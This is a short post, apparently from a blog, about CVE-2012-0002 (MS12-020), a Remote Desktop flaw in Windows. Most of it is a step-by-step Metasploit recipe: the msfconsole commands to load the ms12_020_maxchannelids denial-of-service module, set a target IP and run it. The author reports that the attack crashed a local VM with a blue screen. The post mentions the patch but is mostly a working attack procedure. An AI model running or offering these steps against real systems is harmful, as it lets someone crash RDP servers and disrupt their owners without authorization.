CVE-2012-0002 is an internally reported vulnerability in Microsoft’s Remote Desktop Application. The patch for this vulnerability was released on March 13, 2012, as MS12-020. The vulnerability can lead to a full system compromise, and failed exploitation attempts can cause a DoS for RDP.
Metasploit has a working DoS exploit for this vulnerability. The remote system must be running the Terminal Services service for the exploit to work. Here’s how it goes:
1. Start msfconsole
2. Give the command – use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3. Then set the IP address of the remote system by giving the command – set RHOST <IP>
4. Then give the command – run – to execute the exploit on the remote system
I tried it on a local VM and the VM showed a BSOD.